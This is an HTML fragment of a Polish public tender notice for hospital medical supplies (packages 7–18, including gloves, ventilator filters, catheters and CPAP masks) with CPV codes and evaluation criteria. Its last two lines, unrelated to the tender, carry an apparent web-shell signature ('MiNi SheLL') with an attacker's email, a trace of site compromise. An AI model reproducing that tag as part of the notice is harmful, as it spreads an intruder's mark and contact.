<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> -Pakiet nr 7: Termometry..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termometry, szt.20..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.85.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> -Pakiet nr 8: Filtry do respiratora Nellcor Puritan Bennet 840..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Jednorazowy filtry wydechowy do respiratora Nellcor Puritan Benett serii 800 będącego na wyposażeniu IGiChP, połaczony z pułapką wodną jednorzowego uzytku pasującą do łącznika wydechowego w respiratorze NPB serii 800. 	szt	700
-2.	Jednorazowy Sterylny filtr oddechowy 	szt	1 800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> -Pakiet nr 9: Materiały zużywalne do pomp Medima..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Standardowy zestaw do przetoczeń do pompy Medima Line S.	kpl	400
-2.	Zestaw do przetoczeń leków swiatłoczułych do pomp Medima Line L	kpl	1 600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> -Pakiet nr 10: Przyrząd do pobierania lub wstrzykiwania płynów do/z fiolek i butelek, zgłębniki i zestawy do żywienia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przyrząd do pobierania lub wstrzykiwania płynów do/z fiolek i butelek, zgłębniki i zestawy do żywienia, szt. 10 000..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> -Pakiet nr 11: Rękawice diagnostyczno - zabiegowe medyczne, lateksowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	 Jednorazowe, niejałowe, rękawice diagnostyczne medyczne, lateksowe bezpudrowe 	 	 
	rozmiar  S	szt	200 000
	rozmiar  M	szt	300 000
	rozmiar  L	szt	150 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> -Pakiet nr 12: Rękawice diganostyczno-zabiegowe medyczne, nitrylowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Jednorazowe, niejałowe, rękawice diagnostyczne medyczne, nitrylowe bezpudrowe. 	 	 
	rozmiar  S	szt.	400 000
	rozmiar  M	szt.	700 000
	rozmiar  L	szt.	500 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> -Pakiet nr 13: Miski z pulpy do mycia pacjentów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miski z pulpy do mycia pacjentów, szt. 8 000..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.80.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> -Pakiet nr 14: Cewniki, dreny..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Cewnik do podawania tlenu przez nos tzw. wąsy tlenowe, części donosowe.	szt	400
-2.	Cewnik do podawania tlenu przez nos, regulowany,  tzw. wąsy tlenowe. 	szt	8 000
-3.	Przedłużacz dren tlenowy.	szt	1 500
-4.	Przedłużacz dren tlenowy.	szt	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2, 33.14.16.40-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> -Pakiet nr 15: Dreny, łączniki, zestawy medyczne, rurki tracheostomijne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Dren typu Redona 	 	 
	                     CH    10  - 	szt.	50
	                     CH    12  - 	szt.	100
	                     CH    14  - 	szt.	100
	                     CH    16  - 	szt.	100
-2.	Dren Khera 	 	 
	CH 14	szt.	80
	CH 16	szt.	80
-3.	Zestaw do lewatywy	szt	400
-4.	Kaczka sanitarna platikowa damska/męska	szt	100
-5.	Basen sanitarny plastykowy	szt	60
-6.	Zestaw do cystostomii. 	kpl.	20
-7.	Igła do nakłówania membran sylikonowych portów	szt	20
-8.	Trenażer  oddechu 3-kulkowy typu Triflo II lub równoważny.	szt	300
-9.	Stabilizator położenia oraz ochraniacz przeciwodleżynowy na stopy.	szt	2
-10.	Pozycjoner przeciwodleżynowy.	szt	1
-11.	Podkład do pozycjonera  przeciwodleżynowego do przesuwania pacjenta i zmiany jego pozycji.  	szt.	50
-12.	Filtr oddechowy.	szt	100
-13.	USTNIK  	szt	100
-14.	Rurka dooskrzelowa tracheostomijna, dwuświatłowa prawa.	szt.	2
-15.	Rurka dooskrzelowa tracheostomijna, dwuświatłowa.	szt.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8, 33.14.16.20-2, 33.17.11.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> -Pakiet nr 16: Podkłady chłonne z włókniny..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podkłady chłonne z włókniny, szt. 15 000..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> -Pakiet nr 17: Maski i helm do CPAP, BIPAP,VISION..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Maska pełnotwarzowa (tj. obejmująca usta, nos oraz oczy pacjenta). 	szt.	5
-2.	Maska ustno nosowa do wentylacji nieinwazyjnej	szt.	5
-3.	Hełm do mechanicznej wentylacji nieinwazyjnej 	szt.	4
-4.	Układ pacjemnta respiratora VISON = rura silikonowa. 	szt.	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.71.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> -Pakiet nr 18: Maski do aparatów Res-Med i Bennett..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Maski  ustno - nosowe do wentylacji nieinwazyjnej kompatybilne z respiratorami  firmy Res-Med oraz Bennett. 	 	 
	_ roz.  S	szt	4
	_ roz.  M	szt	5
	_ roz.  L	szt	4
-2.	Maski  ustno - nosowe do wentylacji nieinwazyjnej kompatybilne z respiratorami  firmy Res-Med oraz Bennett.	 	 
	_ roz.  S	szt	3
	_ roz.  M	szt	5
	_ roz.  L	szt	5
-3.	Maski  ustno - nosowe do wentylacji nieinwazyjnej kompatybilne z respiratorami  firmy Res-Med oraz Bennett.	 	 
	_ roz.  S	szt	3
	_ roz.  M	szt	5
	_ roz.  L	szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.71.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com